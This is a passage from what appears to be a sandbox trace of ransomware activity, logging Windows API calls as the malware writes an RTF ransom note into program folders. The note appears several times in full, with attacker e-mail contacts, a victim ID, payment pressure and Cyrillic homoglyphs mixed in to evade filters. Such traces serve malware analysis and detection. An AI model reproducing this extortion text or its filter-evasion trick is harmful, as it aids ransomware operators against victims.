f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2863a28, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.565] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.566] CloseHandle (hObject=0x1fc) returned 1 [0064.566] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rus\\bg85_info.rtf")) returned 0xffffffff [0064.893] GetLastError () returned 0x2 [0064.893] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rus\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0064.894] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 